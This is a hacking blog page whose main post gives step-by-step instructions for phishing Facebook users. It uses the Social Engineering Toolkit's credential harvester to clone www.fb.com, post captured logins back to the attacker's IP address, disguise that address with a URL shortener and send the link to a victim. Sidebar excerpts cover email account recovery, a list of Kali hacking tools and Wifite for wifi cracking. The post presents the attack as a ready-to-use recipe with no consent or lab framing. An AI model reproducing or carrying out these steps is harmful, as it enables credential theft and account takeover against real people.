Skip to main content

How to hack Facebook using Kali Linux : CREDENTIALS HARVESTER ATTACK.


WHAT IS CREDENTIALS HARVESTER ATTACK ?

It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.

STEPS:

1. Boot up kali linux on your machine and open terminal.
 
2. Type this command in the kali linux terminal.
                    
                    root@kali~# setoolkit
 
3. Enter 'y' to agree the social engineering toolkit terms and conditions.
 
4. Select the following options one by one from the menu
 
                '1' (Social Engineering Attacks) then  
                '2'(Website Attack Vectors) then
                '3'(Credential Harvester Attack) then
 
5. Type '2' (Site cloner)
 
          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your ip address)
          
          set:webattack>Enter the url to clone: www.fb.com
 
    
6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.
 
7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. 

Comments

Post a Comment

Popular posts from this blog

These are the precautions you have to take, When your E-MAIL has been Hacked.

It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out by suggesting some of the steps that you need to take as soon as you realize that your  email account is hacked . Here is a list of steps and procedures that you need to follow in order to initiate the password recovery process: Steps to Recover Gmail Password: It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try: Step-1:  Try resetting your password! This is the fir...
Post a Comment
Read more

The 20 Most Popular Hacking Tools for "Kali Linux"

Top 20 Most Popular Hacking Tools for "Kali Linux". I n the world of cyber security, there are many tools available on the internet, many of them are free and others are paid. 1.  Aircrack-ng Aircrack-ng.org is an 802.11 WEP and WPA-PSK keys breaking program that can resolve keys once enough information regarding the term stolen. It executes the standard FMS attack alongside a few improvements like KoreK breachand additionally the all-new PTW attack, in this way making the assault much quicker contrasted with other WEP splitting devices. Actually, Aircrack-ng is an arrangement of software for evaluating remote systems. 2.  sqlmap sqlmap is an open source infiltration testing device that robotized the procedure of recognizing and abusing SQL infusion imperfections and assuming control of database servers. Full support for  MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB  data...
Post a Comment
Read more

Wifite : Hacking Wifi the easy way : Kali Linux.

Wifite While the aircrack-ng suite is a well known name in the wireless hacking , the same can't be said about Wifite. Living in the shade of the greatness of established aircrack-ng suite, Wifite has finally made a mark in a field where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not independent (eg. it  hacks WPS using reaver ), it does what it promises, and puts hacking on autopilot. I'm listing some features, before I tell you how to use wifite (which I don't think is necessary at all, as anyone who can understand simple English instructions given by Wifite can use it on his own).   Features Of Wifite Sorts targets by signal strength (in dB); cracks closest access points first Automatically de-authenticates clients of hidden networks to reveal SSIDs Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc) Customizable settings (timeouts, packets/se...
Post a Comment
Read more